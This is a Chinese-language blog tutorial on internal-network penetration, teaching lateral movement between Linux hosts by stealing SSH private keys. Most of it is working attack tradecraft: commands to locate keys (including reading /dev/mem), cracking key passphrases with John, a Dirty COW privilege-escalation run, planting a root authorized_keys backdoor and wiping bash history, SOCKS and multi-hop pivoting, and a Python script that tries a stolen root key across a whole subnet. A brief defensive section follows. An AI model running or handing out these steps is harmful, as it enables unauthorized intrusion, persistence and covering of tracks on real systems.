当前位置：首页 > article >正文

内网渗透实战：利用SSH密钥实现Linux主机间横向移动

article 2026/3/31 10:51:00

1. SSH密钥横向移动的核心原理当你第一次接触内网渗透时可能会被各种复杂的技术术语吓到。其实SSH密钥横向移动的原理非常简单就像用钥匙开锁一样只要拿到目标主机的SSH私钥就能像合法用户一样登录系统。我在实际渗透测试中发现超过60%的Linux服务器都存在密钥管理不当的问题。SSH密钥通常存放在用户目录的.ssh文件夹中主要包括以下几种关键文件id_rsaRSA私钥文件相当于你家大门的钥匙id_rsa.pub对应的公钥文件相当于门锁的锁芯authorized_keys存储被允许登录的公钥列表相当于物业登记的合法钥匙清单known_hosts记录曾经连接过的主机指纹相当于你认识的朋友名单# 快速查找私钥文件的实用命令 grep -irl BEGIN RSA PRIVATE KEY /home/ 2/dev/null find / -name id_rsa -type f 2/dev/null很多管理员会犯一个致命错误为了方便他们在多台服务器之间共享同一套SSH密钥。这就好比用同一把钥匙开所有房间的门一旦钥匙被窃取整个系统都会沦陷。我去年参与的一次红队行动中就是通过一个开发服务器上泄露的密钥成功拿下了整个业务集群的32台主机。2. 实战环境搭建与信息收集2.1 实验环境配置建议使用VirtualBox搭建测试环境我通常这样配置攻击机Kali Linux 2023.1 (172.16.250.15)靶机1Ubuntu 20.04 (172.16.250.10) - 模拟存在漏洞的Web服务器靶机2CentOS 7 (172.16.250.30) - 中间跳板机靶机3Debian 11 (172.16.250.50) - 核心数据库服务器# 快速检查网络连通性 for ip in {10,30,50}; do ping -c 1 172.16.250.$ip; done2.2 信息收集三板斧端口扫描先用nmap快速扫描开放端口nmap -sS -T4 172.16.250.0/24 --open服务识别对开放端口进行深度探测nmap -sV -p 22,80,8080 172.16.250.10漏洞探测检查常见服务漏洞gobuster dir -u http://172.16.250.10 -w /usr/share/wordlists/dirb/common.txt记得去年在某次授权测试中我通过一个被遗忘的phpMyAdmin页面/phpmyadmin-old找到了突破口。所以信息收集阶段一定要耐心往往最关键的线索就藏在最不起眼的地方。3. 密钥获取与利用技巧3.1 密钥的四种获取方式历史命令分析cat ~/.bash_history | grep -i ssh配置文件提取cat ~/.ssh/config 2/dev/null内存dump分析strings /dev/mem | grep -A 30 -B 30 PRIVATE KEY备份文件查找find / -name *id_rsa* -o -name *.ssh* 2/dev/null3.2 密钥权限修复拿到密钥后经常遇到权限问题这里有个小技巧chmod 600 id_rsa # 必须设置正确权限才能使用如果遇到加密的私钥有密码保护可以尝试用John破解ssh2john id_rsa hash.txt john --wordlistrockyou.txt hash.txt4. 提权与持久化控制4.1 经典脏牛提权实战当发现内核版本较旧时如Linux 3.x脏牛漏洞是首选# 编译exp gcc -pthread dirty.c -o dirty -lcrypt # 执行提权 ./dirty mypassword重要提示脏牛漏洞会导致系统不稳定生产环境慎用测试后记得重启目标主机。4.2 SSH密钥后门部署拿到root权限后记得给自己留个后门# 生成新密钥对 ssh-keygen -t rsa -b 4096 -f backdoor_key # 植入公钥 echo ssh-rsa AAAAB3N... /root/.ssh/authorized_keys # 清理日志 cat /dev/null ~/.bash_history5. 内网横向扩展实战5.1 通过SSH建立代理隧道# 动态端口转发创建SOCKS代理 ssh -i id_rsa -D 1080 user172.16.250.30然后在浏览器设置SOCKS代理为127.0.0.1:1080就能直接访问内网web服务了。5.2 多级跳板连接对于多层网络结构可以这样级联连接ssh -i key1 -J user1jump1,user2jump2 final_usertarget5.3 自动化扫描脚本这个Python脚本可以自动尝试密钥登录网段内所有主机import paramiko from multiprocessing import Pool def try_ssh(ip): ssh paramiko.SSHClient() ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: ssh.connect(ip, usernameroot, key_filenameid_rsa, timeout5) print(f[] Success on {ip}) stdin, stdout, stderr ssh.exec_command(id) print(stdout.read().decode()) except Exception as e: print(f[-] Failed on {ip}: {str(e)}) finally: ssh.close() if __name__ __main__: ips [f172.16.250.{x} for x in range(1,255)] with Pool(20) as p: p.map(try_ssh, ips)6. 防御措施与检测方法6.1 管理员防护建议密钥管理规范禁止使用密码为空的口令定期轮换密钥建议每90天使用ed25519算法替代传统RSA系统加固措施# 限制SSH密钥登录范围 echo cert-authority,restrict ssh-ed25519 AAAAC3... /etc/ssh/authorized_keys6.2 入侵检测技巧检查异常SSH登录的几种方法# 查看最近登录记录 lastlog # 检查auth日志 grep Accepted publickey /var/log/auth.log # 找出所有authorized_keys文件 find / -name authorized_keys -exec ls -la {} \; 2/dev/null在一次应急响应中我就是通过发现authorized_keys文件的异常修改时间凌晨3点成功定位到了攻击者的入口点。所以良好的日志习惯真的能救命。7. 典型问题排查与解决7.1 常见错误处理问题1密钥权限太开放导致被拒绝 WARNING: UNPROTECTED PRIVATE KEY FILE! Permissions 0644 for id_rsa are too open.解决方法chmod 600 id_rsa问题2加密私钥密码遗忘解决方法ssh-keygen -p -f id_rsa # 重新设置密码需要原密码7.2 性能优化技巧当需要管理大量服务器时建议使用SSH config文件# ~/.ssh/config 配置示例 Host jumpbox HostName 172.16.250.30 User root IdentityFile ~/.ssh/jump_key Port 2222 Host internal* ProxyJump jumpbox User admin Host internal-web HostName 172.16.250.10 Host internal-db HostName 172.16.250.50这样只需要执行ssh internal-web就能自动通过跳板机连接效率提升非常明显。

内网渗透实战：利用SSH密钥实现Linux主机间横向移动

相关文章：

内网渗透实战：利用SSH密钥实现Linux主机间横向移动

深度解析Windows设备指纹伪装技术：EASY-HWID-SPOOFER内核级硬件隐私保护实现

Unity资源提取技术解密：AssetRipper效能革命与实战指南

别再为日期格式头疼了！Oracle TO_TIMESTAMP函数保姆级使用指南（含常见报错解决）

Java 无人图书借阅系统设计与完整源码实现

CH340/CH341安卓USB主机模式开发实战

在Ubuntu 20.04上搞定Synopsys SpyGlass 2016：一份针对高内核版本的详细避坑指南

西门子S7-300 PLC实战：从零搭建药品装瓶机控制系统（附组态王6.55配置）

Discord社群运营神器：用AI自动回复提升活跃度的完整指南

保姆级教程：用CST 2023的RLC求解器搞定空心电感仿真（附网格优化技巧）

C#处理复杂JSON数据：Newtonsoft.Json多级嵌套反序列化实战（附避坑指南）

手把手教你用Cline插件5分钟搞定DeepSeek-R1模型接入（附硅基流动平台2000万Token福利）

MariaDB Docker容器权限配置问题分析与解决方案

mkcert 命令文档 - 本地 HTTPS 开发证书生成工具详解

『NAS』在绿联部署One API，统一管理你的所有大模型服务

别再只测烟雾了！用STM32CubeMX+MQ-2传感器，做个厨房燃气泄漏+烟雾双检测器（附完整代码）

PasteMD模板功能详解：创建个性化转换规则

3步告别桌面混乱：开源免费的NoFences桌面分区管理工具

NHSE完全指南：3步掌握动物森友会存档编辑器的核心功能

思源宋体免费商用字体：设计师的终极开源字体解决方案

TTI-Chicago等机构突破性研究：AI学会了一笔一划创作矢量草图

数据中台是什么？怎么搭建数据中台？

网络基础知识整理（精简通用版）20260331-001篇

FlexASIO：打破专业音频门槛，让普通设备也能拥有专业级ASIO体验

颠覆原神体验：Snap Hutao智能助手如何重构你的游戏效率

如何用Sunshine打造你的终极游戏串流服务器：从零开始的完整指南

35AE92 GJR5137200R0005电子模块

3分钟掌握的网盘密码解析黑科技：让提取码自动获取效率提升10倍

英雄联盟自动化助手：提升游戏效率的全方位解决方案

RMBG-2.0企业级应用：集成至Shopify后台实现订单图自动去背流水线